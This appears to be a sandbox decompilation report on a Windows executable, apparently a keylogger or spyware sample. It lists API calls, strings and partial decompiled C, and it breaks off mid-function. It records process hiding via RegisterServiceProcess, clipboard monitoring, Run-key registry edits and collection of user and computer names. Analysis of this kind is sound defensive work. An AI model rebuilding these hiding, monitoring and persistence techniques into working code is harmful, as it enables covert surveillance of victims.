0x004210f5
0x004210f5
0x004210f5
0x004210fc
0x004210fc
0x00421105
0x0042110a
0x00421110
0x00421112
0x00421118
0x0042111a
0x0042111a
0x00421118
0x0042111f
0x00421125
0x0042112b
0x0042112f
0x0042112f
0x00421134
0x0042113a
0x0042113e
0x0042113e
0x00421145
0x00421147
0x0042114c
0x0042114d
0x00421150
0x00421152
0x0042115e
0x0042117d
0x0042117d
0x00421160
0x00421160
0x00421161
0x00421164
0x00421167
0x0042116c
0x0042116d
0x0042116e
0x00421173
0x00421176
0x00421176
0x0042117f
0x00421183
0x00421189
0x0042118c
0x0042118e
0x00421190
0x00421190
0x00421195
0x0042119d
0x0042119e
0x0042119f
0x004211a6
0x004211b4
0x004211b9
0x004211b9
0x004211b9
0x004211c0
0x004211cd
0x004211d3
0x004211d5
0x004211db
0x00000000
0x004211db
0x00420ecf
0x00420def
0x00420df6
0x00420dfb
0x00420e02
0x00420e0d
0x00420e13
0x00420e19
0x00420e1e
0x00420e20
0x00420e5d
0x00420e5d
0x00420e5d
0x00420e67
0x00000000
0x00420e67
0x00420e22
0x00420e28
0x00420e2a
0x00420e30
0x00420e30
0x00420e43
0x00420e49
0x00420e53
0x00000000
0x00420dd7
0x00420dd9
0x00420dde
0x00420eed
0x00420efa
0x00420f00
0x004211dc
0x004211e1
0x004211ea
0x004211ea

APIs

__EH_prolog.LIBCMT ref: 00420D69
#4710.MFC42 ref: 00420D79
#3811.MFC42(?), ref: 00420D90
#924.MFC42(?,004558C8,pk.bin,?), ref: 00420DAB

Part of subcall function 0040BC5C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040BC82

#800.MFC42(?,004558C8,pk.bin,?), ref: 00420DC7
#2514.MFC42 ref: 00420E19
PostMessageA.USER32 ref: 00420E43
#2514.MFC42 ref: 00420E92
#641.MFC42 ref: 00420EB0
#6199.MFC42(PKL Window), ref: 00420EBC
PostMessageA.USER32 ref: 00420EFA
SetTimer.USER32(?,00000002,0000012C,00000000), ref: 00420F85
SetTimer.USER32(?,00000010,0002BF20,00000000), ref: 00420F92
SetTimer.USER32(?,00000012,00003A98,00000000), ref: 00420F9F
GetModuleHandleA.KERNEL32(KERNEL32.DLL,00000000,?), ref: 00420FDA
GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00420FE6
GetCurrentProcessId.KERNEL32(?), ref: 00420FFD

Part of subcall function 0041AFE1: RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer,?), ref: 0041B008
Part of subcall function 0041AFE1: RegQueryValueExA.ADVAPI32(?,IEPK,00000000,00000000,?,00000008), ref: 0041B024
Part of subcall function 0041AFE1: RegCloseKey.ADVAPI32(?), ref: 0041B042

SetTimer.USER32(?,0000000E,0000EA60,00000000), ref: 00421031
SetTimer.USER32(?,00000011,0000EA60,00000000), ref: 00421046
SetTimer.USER32(?,0000000F,?,00000000), ref: 0042106C
SetClipboardViewer.USER32(?), ref: 00421079
#800.MFC42(?,?,?,?,?,PKL Window), ref: 004210F0
#800.MFC42(?,?,?,?,?,PKL Window), ref: 004210FC
#823.MFC42(00000060), ref: 00421147
#924.MFC42(?,004558C4,bpkch.dat,00000060), ref: 0042116E
#924.MFC42(?,004558C4,web.dat), ref: 0042119F
#800.MFC42 ref: 004211C0
GetDlgItem.USER32 ref: 004211CD

Part of subcall function 00428249: strrchr.MSVCRT ref: 00428265
Part of subcall function 00428249: RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428284
Part of subcall function 00428249: RegDeleteValueA.ADVAPI32(?,?), ref: 00428293
Part of subcall function 00428249: RegCloseKey.ADVAPI32(?), ref: 0042829E
Part of subcall function 00428249: RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004282AE
Part of subcall function 00428249: RegDeleteValueA.ADVAPI32(?,?), ref: 004282B7
Part of subcall function 00428249: RegCloseKey.ADVAPI32(?), ref: 004282BC

Strings

web.dat, xrefs: 00421195
bpkch.dat, xrefs: 00421167
KERNEL32.DLL, xrefs: 00420FCF
pk.bin, xrefs: 00420D97
PKL Window, xrefs: 00420EB5
RegisterServiceProcess, xrefs: 00420FE0

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Timer$#800$#924CloseValue$#2514CreateDeleteMessageOpenPost$#3811#4710#6199#641#823AddressClipboardCurrentFileH_prologHandleItemModuleProcProcessQueryViewerstrrchr
String ID: KERNEL32.DLL$PKL Window$RegisterServiceProcess$bpkch.dat$pk.bin$web.dat
API String ID: 1949676480-2796755654
Opcode ID: 856523f80d10deadebd798e44b822c3a2f57e943ff31f9122f6e00b473e03b99
Instruction ID: db618901531a8d3c67ace127e96e8c737a02fc6d470e0899931d681dfb9774f8
Opcode Fuzzy Hash: 856523f80d10deadebd798e44b822c3a2f57e943ff31f9122f6e00b473e03b99
Instruction Fuzzy Hash: 36C1E570A04754AADB31EB71DC41AEFBBF4AF19304F40095FF15AA71E2DA785A44CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2B3, Relevance: 52.7, APIs: 35, Instructions: 229
windowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041A2B3() {
				void* __ebx;
				void* __esi;
				intOrPtr _t84;
				intOrPtr _t86;
				long _t87;
				void* _t89;
				void* _t91;
				void* _t97;
				int _t99;
				void* _t145;
				intOrPtr _t150;
				long _t151;
				void* _t152;
				struct HWND__* _t154;
				void* _t155;

				E0043E4E0(0x4413c7, _t155);
				_t150 =  *((intOrPtr*)(_t155 + 8));
				if(_t150 != 0) {
					 *(_t155 - 0x24) =  *(_t150 + 0x20);
				} else {
					 *(_t155 - 0x24) = 0;
				}
				L0043DDD8();
				 *(_t155 - 4) = 0;
				L0043DDD8();
				 *(_t155 - 4) = 1;
				L0043DDD8();
				 *(_t155 - 4) = 2;
				L0043DDD8();
				_push(_t155 - 0x18);
				_push(0x42d);
				 *(_t155 - 4) = 3;
				L0043E2E2();
				_push(_t155 - 0x1c);
				_push(0x42f);
				L0043E2E2();
				_push(_t155 - 0x20);
				_push(0x430);
				L0043E2E2();
				_t84 = _t155 + 8;
				_push(_t84);
				_push(0x432);
				L0043E2E2();
				_push(1);
				_push(0);
				_push(0x42e);
				L0043E2DC();
				 *((intOrPtr*)(_t155 - 0x10)) = _t84;
				if( *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x18)) - 8)) != 0) {
					_t86 =  *((intOrPtr*)(_t155 + 8));
					if( *((intOrPtr*)(_t86 - 8)) != 0) {
						_push(0x44a);
						L0043E066();
						_t87 = SendMessageA( *(_t86 + 0x20), 0x147, 0, 0);
						_t151 = _t87;
						L00412BAB(_t87, 0, _t155 - 0x40, _t145, _t151);
						_push(0);
						_push( *((intOrPtr*)(_t155 - 0x10)));
						 *(_t155 - 4) = 4;
						_push( *((intOrPtr*)(_t155 - 0x20)));
						_push( *((intOrPtr*)(_t155 - 0x1c)));
						_push(_t151);
						_push( *((intOrPtr*)(_t155 - 0x18)));
						L00412C8A(_t87, 0, _t155 - 0x40, _t145, _t151);
						if(_t87 != 0) {
							L00411E5A(_t87, 0, _t155 - 0x110, _t145, _t151);
							_push(_t155 + 8);
							 *(_t155 - 4) = 5;
							_t89 = E00410E20(_t155 - 0x14);
							_push(0);
							_push(_t89);
							 *(_t155 - 4) = 6;
							L00412165(_t89, 0, _t155 - 0x110, _t145, _t151);
							 *(_t155 - 4) = 7;
							L0043DD36();
							 *(_t155 - 4) = 5;
							L0043DD36();
							_push(_t155 + 8);
							_t91 = E00410E20(_t155 - 0x14);
							 *(_t155 - 4) = 8;
							E00410E56(_t155 - 0x10c, _t91);
							 *(_t155 - 4) = 9;
							L0043DD36();
							 *(_t155 - 4) = 5;
							L0043DD36();
							_push(E00429029(_t155 - 0x10, 0xe06a));
							 *(_t155 - 4) = 0xa;
							L0043DFCA();
							 *(_t155 - 4) = 5;
							L0043DD36();
							_push(E00429029(_t155 - 0x10, 0xe049));
							 *(_t155 - 4) = 0xb;
							L004128F9(_t96, 0, _t155 - 0x110, _t145, _t151);
							 *(_t155 - 4) = 5;
							L0043DD36();
							_t97 = _t155 - 0x110;
							_push(_t97);
							L00412FF7(_t97, 0, _t155 - 0x40, _t145, _t151);
							_push(0xffffffff);
							if(_t97 != 0) {
								_push(0x40);
								_push(0xe04a);
								L0043E2CA();
								_t152 = 1;
							} else {
								_push(0x10);
								_push(0xe024);
								L0043E2CA();
								_t152 = 0;
							}
							_t99 = EnableWindow(GetDlgItem( *(_t155 - 0x24), 0x3e8), 1);
							 *(_t155 - 4) = 4;
							L00411F64(_t99, 0, _t155 - 0x110, _t145, _t152);
						} else {
							_push(0xffffffff);
							_push(0x30);
							_push(0xe023);
							L0043E2CA();
							_t99 = EnableWindow(GetDlgItem( *(_t155 - 0x24), 0x3e8), 1);
							_t152 = 0;
						}
						 *(_t155 - 4) = 3;
						L00412C30(_t99, 0, _t155 - 0x40, _t145, _t152);
					} else {
						_push(0xffffffff);
						_push(0x30);
						_push(0xe028);
						L0043E2CA();
						_push(0);
						_push(0x432);
						goto L5;
					}
				} else {
					_push(0xffffffff);
					_push(0x30);
					_push(0xe022);
					L0043E2CA();
					_push(0);
					_push(0x42d);
					L5:
					PostMessageA( *(_t150 + 0x20), 0x5a3, ??, ??);
					if(_t150 != 0) {
						_t154 =  *(_t150 + 0x20);
					} else {
						_t154 = 0;
					}
					EnableWindow(GetDlgItem(_t154, 0x3e8), 1);
					_t152 = 0;
				}
				 *(_t155 - 4) = 2;
				L0043DD36();
				 *(_t155 - 4) = 1;
				L0043DD36();
				 *(_t155 - 4) = 0;
				L0043DD36();
				 *(_t155 - 4) =  *(_t155 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t155 - 0xc));
				return _t152;
			}

0x0041a2b8
0x0041a2c5
0x0041a2cd
0x0041a2d7
0x0041a2cf
0x0041a2cf
0x0041a2cf
0x0041a2dd
0x0041a2e5
0x0041a2e8
0x0041a2f0
0x0041a2f4
0x0041a2fc
0x0041a300
0x0041a30d
0x0041a30e
0x0041a311
0x0041a315
0x0041a31f
0x0041a320
0x0041a325
0x0041a32f
0x0041a330
0x0041a335
0x0041a33a
0x0041a33f
0x0041a340
0x0041a345
0x0041a34a
0x0041a34c
0x0041a34d
0x0041a354
0x0041a359
0x0041a362
0x0041a3a9
0x0041a3af
0x0041a3c7
0x0041a3ce
0x0041a3dd
0x0041a3e6
0x0041a3e8
0x0041a3ed
0x0041a3f1
0x0041a3f4
0x0041a3f8
0x0041a3fb
0x0041a3fe
0x0041a3ff
0x0041a402
0x0041a409
0x0041a43d
0x0041a448
0x0041a449
0x0041a44d
0x0041a452
0x0041a453
0x0041a45a
0x0041a45e
0x0041a466
0x0041a46a
0x0041a472
0x0041a476
0x0041a481
0x0041a482
0x0041a48e
0x0041a492
0x0041a49a
0x0041a49e
0x0041a4a6
0x0041a4aa
0x0041a4bf
0x0041a4c6
0x0041a4ca
0x0041a4d2
0x0041a4d6
0x0041a4eb
0x0041a4f2
0x0041a4f6
0x0041a4fe
0x0041a502
0x0041a507
0x0041a510
0x0041a511
0x0041a518
0x0041a51a
0x0041a52c
0x0041a52e
0x0041a533
0x0041a53a
0x0041a51c
0x0041a51c
0x0041a51e
0x0041a523
0x0041a528
0x0041a528
0x0041a54c
0x0041a558
0x0041a55c
0x0041a40b
0x0041a40b
0x0041a40d
0x0041a40f
0x0041a414
0x0041a42a
0x0041a430
0x0041a430
0x0041a564
0x0041a568
0x0041a3b1
0x0041a3b1
0x0041a3b3
0x0041a3b5
0x0041a3ba
0x0041a3bf
0x0041a3c0
0x00000000
0x0041a3c0
0x0041a364
0x0041a364
0x0041a366
0x0041a368
0x0041a36d
0x0041a372
0x0041a373
0x0041a374
0x0041a37c
0x0041a384
0x0041a38a
0x0041a386
0x0041a386
0x0041a386
0x0041a39c
0x0041a3a2
0x0041a3a2
0x0041a570
0x0041a574
0x0041a57c
0x0041a580
0x0041a588
0x0041a58b
0x0041a590
0x0041a597
0x0041a5a4
0x0041a5ac

APIs

__EH_prolog.LIBCMT ref: 0041A2B8
#540.MFC42 ref: 0041A2DD
#540.MFC42 ref: 0041A2E8
#540.MFC42 ref: 0041A2F4
#540.MFC42 ref: 0041A300
#3097.MFC42(0000042D,?), ref: 0041A315
#3097.MFC42(0000042F,?,0000042D,?), ref: 0041A325
#3097.MFC42(00000430,?,0000042F,?,0000042D,?), ref: 0041A335
#3097.MFC42(00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A345
#3095.MFC42(0000042E,00000000,00000001,00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A354
#1199.MFC42(0000E022,00000030,000000FF,0000042E,00000000,00000001,00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A36D
PostMessageA.USER32 ref: 0041A37C
GetDlgItem.USER32 ref: 0041A395
EnableWindow.USER32(00000000), ref: 0041A39C
#1199.MFC42(0000E028,00000030,000000FF,0000042E,00000000,00000001,00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A3BA

Part of subcall function 00410E20: __EH_prolog.LIBCMT ref: 00410E25
Part of subcall function 00410E20: #540.MFC42 ref: 00410E31
Part of subcall function 00410E20: #535.MFC42(?), ref: 00410E40

#3092.MFC42(0000044A,0000042E,00000000,00000001,00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A3CE
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0041A3DD
#1199.MFC42(0000E023,00000030,000000FF), ref: 0041A414
GetDlgItem.USER32 ref: 0041A423
EnableWindow.USER32(00000000), ref: 0041A42A
#800.MFC42 ref: 0041A46A
#800.MFC42 ref: 0041A476

Part of subcall function 00410E56: #858.MFC42(?,?,?,00410E0F,?), ref: 00410E5F
Part of subcall function 00410E56: #858.MFC42(?,?,?,?,00410E0F,?), ref: 00410E6B

#800.MFC42(00000000), ref: 0041A49E
#800.MFC42(00000000), ref: 0041A4AA

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#858.MFC42(00000000,00000000), ref: 0041A4CA
#800.MFC42(00000000,00000000), ref: 0041A4D6
#800.MFC42 ref: 0041A502
#1199.MFC42(0000E024,00000010,000000FF), ref: 0041A523
#1199.MFC42(0000E04A,00000040,000000FF), ref: 0041A533
GetDlgItem.USER32 ref: 0041A545
EnableWindow.USER32(00000000), ref: 0041A54C
#800.MFC42 ref: 0041A574
#800.MFC42 ref: 0041A580
#800.MFC42 ref: 0041A58B
#800.MFC42 ref: 0041A597

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#1199#540$#3097$#858EnableItemWindow$H_prologMessage$#1168#3092#3095#535#537LoadPostSendString
String ID:
API String ID: 3760145750-0
Opcode ID: 5bb151dad685cbb491c8ef6e692716fd24c267e89cc1aace86dd8dc30ffe76d8
Instruction ID: 816b95db5f3ba935112ce0acf2f68253f7a3b3dca8a4a83a310e4f3aef61808b
Opcode Fuzzy Hash: 5bb151dad685cbb491c8ef6e692716fd24c267e89cc1aace86dd8dc30ffe76d8
Instruction Fuzzy Hash: DE91A3B0D01259EADB11EBE1C946BEEBB78AF18308F10055EF616731C1DBB81B44CA29

Uniqueness

Uniqueness Score: -1.00%

Function 00424571, Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 194
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00424571() {
				char _t92;
				char _t98;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr _t116;
				int _t123;
				signed int _t128;
				signed int _t130;
				void* _t165;

				E0043E4E0(0x442838, _t165);
				_push(_t165 - 0x5c);
				L0043E4A4();
				 *(_t165 - 0xd4) = 0;
				GetTimeFormatA(0x400, 2, _t165 - 0x5c, 0, _t165 - 0xd4, 0x32);
				 *(_t165 - 0xa0) = 0;
				GetDateFormatA(0x400, 0, _t165 - 0x5c, 0, _t165 - 0xa0, 0x32);
				_t92 =  *0x4550cc; // 0x0
				 *(_t165 - 0x1d4) = _t92;
				_t128 = 0x1f;
				memset(_t165 - 0x1d3, 0, _t128 << 2);
				asm("stosw");
				asm("stosb");
				 *(_t165 - 0x10) = 0x80;
				GetUserNameA(_t165 - 0x1d4, _t165 - 0x10);
				_t98 =  *0x4550cc; // 0x0
				 *(_t165 - 0x154) = _t98;
				_t130 = 0x1f;
				memset(_t165 - 0x153, 0, _t130 << 2);
				asm("stosw");
				asm("stosb");
				 *(_t165 - 0x10) = 0x80;
				GetComputerNameA(_t165 - 0x154, _t165 - 0x10);
				_push(0x4532cc);
				L0043DE26();
				_t104 = _t165 - 0x154;
				_push(_t104);
				 *(_t165 - 4) = 0;
				L0043DE26();
				 *(_t165 - 4) = 1;
				_push(_t165 + 0xc);
				_push(_t104);
				_t105 = _t165 - 0x20;
				_push(_t105);
				L0043E282();
				 *(_t165 - 4) = 2;
				_push(_t165 - 0x1d4);
				_push(_t105);
				_t106 = _t165 - 0x1c;
				_push(_t106);
				L0043DE20();
				 *(_t165 - 4) = 3;
				_push(_t165 + 0xc);
				_push(_t106);
				_t107 = _t165 - 0x24;
				_push(_t107);
				L0043E282();
				 *(_t165 - 4) = 4;
				_push(_t165 - 0xa0);
				_push(_t107);
				_t108 = _t165 - 0x2c;
				_push(_t108);
				L0043DE20();
				 *(_t165 - 4) = 5;
				_push(_t165 + 0xc);
				_push(_t108);
				_t109 = _t165 - 0x28;
				_push(_t109);
				L0043E282();
				 *(_t165 - 4) = 6;
				_push(_t165 - 0xd4);
				_push(_t109);
				_push(_t165 - 0x14);
				L0043DE20();
				 *(_t165 - 4) = 0xd;
				L0043DD36();
				 *(_t165 - 4) = 0xc;
				L0043DD36();
				 *(_t165 - 4) = 0xb;
				L0043DD36();
				 *(_t165 - 4) = 0xa;
				L0043DD36();
				 *(_t165 - 4) = 9;
				L0043DD36();
				 *(_t165 - 4) = 8;
				L0043DD36();
				SetBkMode( *(_t165 + 8), 1);
				SetTextColor( *(_t165 + 8), 0xffffff);
				DrawTextA( *(_t165 + 8),  *(_t165 - 0x14), 0xffffffff, _t165 - 0x4c, 0xc00);
				_t116 =  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x10))));
				 *((intOrPtr*)(_t165 - 0x34)) = _t116;
				 *(_t165 - 0x3c) = _t116 -  *((intOrPtr*)(_t165 - 0x44)) +  *(_t165 - 0x4c);
				 *((intOrPtr*)(_t165 - 0x38)) = 0;
				_push(0);
				 *((intOrPtr*)(_t165 - 0x30)) =  *((intOrPtr*)(_t165 - 0x40)) -  *((intOrPtr*)(_t165 - 0x48));
				_push(0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(2);
				asm("movsd");
				L0043E4AA();
				FillRect( *(_t165 + 8), _t165 - 0x6c, GetStockObject(2));
				_t123 = DrawTextA( *(_t165 + 8),  *(_t165 - 0x14), 0xffffffff, _t165 - 0x3c, 0x800);
				 *(_t165 - 4) = 0;
				L0043DD36();
				 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0xc));
				return _t123;
			}

0x00424576
0x0042458a
0x0042458b
0x004245a8
0x004245ae
0x004245c4
0x004245ca
0x004245d0
0x004245d7
0x004245dd
0x004245e6
0x004245e8
0x004245ea
0x004245fb
0x004245fe
0x00424604
0x0042460b
0x00424611
0x0042461a
0x0042461c
0x0042461e
0x00424622
0x0042462d
0x00424633
0x0042463b
0x00424640
0x00424649
0x0042464a
0x0042464d
0x00424655
0x00424659
0x0042465a
0x0042465b
0x0042465e
0x0042465f
0x0042466a
0x0042466e
0x0042466f
0x00424670
0x00424673
0x00424674
0x0042467c
0x00424680
0x00424681
0x00424682
0x00424685
0x00424686
0x00424691
0x00424695
0x00424696
0x00424697
0x0042469a
0x0042469b
0x004246a3
0x004246a7
0x004246a8
0x004246a9
0x004246ac
0x004246ad
0x004246b8
0x004246bc
0x004246bd
0x004246c1
0x004246c2
0x004246ca
0x004246ce
0x004246d6
0x004246da
0x004246e2
0x004246e6
0x004246ee
0x004246f2
0x004246fa
0x004246fe
0x00424706
0x0042470a
0x00424714
0x00424722
0x00424739
0x00424742
0x00424746
0x0042474f
0x0042475e
0x00424761
0x00424762
0x00424765
0x00424766
0x00424767
0x00424768
0x00424769
0x0042476b
0x00424770
0x00424771
0x00424786
0x0042479d
0x004247a6
0x004247a9
0x004247ae
0x004247b5
0x004247c0
0x004247c8

APIs

__EH_prolog.LIBCMT ref: 00424576
#6673.MFC42(?), ref: 0042458B
GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032,?), ref: 004245AE
GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004245CA
GetUserNameA.ADVAPI32(?,?), ref: 004245FE
GetComputerNameA.KERNEL32 ref: 0042462D
#537.MFC42(004532CC), ref: 0042463B
#537.MFC42(?,004532CC), ref: 0042464D
#922.MFC42(?,00000000,?,?,004532CC), ref: 0042465F
#924.MFC42(?,00000000,?,?,00000000,?,?,004532CC), ref: 00424674
#922.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,004532CC), ref: 00424686
#924.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,004532CC), ref: 0042469B
#922.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246AD
#924.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246C2
#800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246CE
#800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246DA
#800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246E6
#800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246F2
#800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246FE
#800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0042470A
SetBkMode.GDI32(?,00000001), ref: 00424714
SetTextColor.GDI32(?,00FFFFFF), ref: 00424722
DrawTextA.USER32(?,?,000000FF,?,00000C00), ref: 00424739
#3920.MFC42(00000002,00000002,00000000,00000000), ref: 00424771
GetStockObject.GDI32(00000002), ref: 00424778
FillRect.USER32 ref: 00424786
DrawTextA.USER32(?,?,000000FF,?,00000800), ref: 0042479D
#800.MFC42 ref: 004247A9
#800.MFC42 ref: 004247B5

Strings

8(D, xrefs: 00424571

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#922#924Text$#537DrawFormatName$#3920#6673ColorComputerDateFillH_prologModeObjectRectStockTimeUser
String ID: 8(D
API String ID: 1756050742-4191503897
Opcode ID: b7316398b5bbac95001521d3d3ff0a0adf417f377f5c74cbe51a12d56796a24a
Instruction ID: 11fff55d11db09615e8b56f13bff350be643aef242557b62dc4dde581cf7e577
Opcode Fuzzy Hash: b7316398b5bbac95001521d3d3ff0a0adf417f377f5c74cbe51a12d56796a24a
Instruction Fuzzy Hash: 78714771C0024DAEDB05DBA4DC45BEEBBB8AB19304F0081AAF515A7291DB785B09CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041F000, Relevance: 45.1, APIs: 30, Instructions: 142
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041F000(void* __eax, signed int __ebx, void* __edi, void* __esi) {
				void* _t19;
				void* _t24;
				signed int _t28;
				void* _t30;
				int _t66;
				void* _t69;
				void* _t73;
				intOrPtr _t81;

				_t28 = __ebx;
				_t19 = __eax;
				_push(0x43b);
				_t66 = __edi + 0x6c;
				L0043E066();
				if(_t66 != 0) {
					_t66 =  *(_t66 + 4);
				}
				SendMessageA( *(_t19 + 0x20), 0x30, _t66, 1);
				_push(1);
				_push(0x421);
				L0043DF82();
				_push( *0x4554b4);
				_push(0x463);
				L0043E066();
				L0043E15C();
				_t23 = strcmp( *(E00429029(_t73 - 0x10, 0xe031)), 0x4555bc);
				L0043DD36();
				if((_t28 & 0xffffff00 | _t23 == 0x00000000) == 0) {
					_t30 = 0x465;
					_push(0x4555bc);
					_push(0x465);
					L0043E066();
					L0043E15C();
				} else {
					_push( *((intOrPtr*)(E00429029(_t73 - 0x10, 0xe032))));
					 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
					_t30 = 0x465;
					_push(0x465);
					L0043E066();
					L0043E15C();
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					L0043DD36();
				}
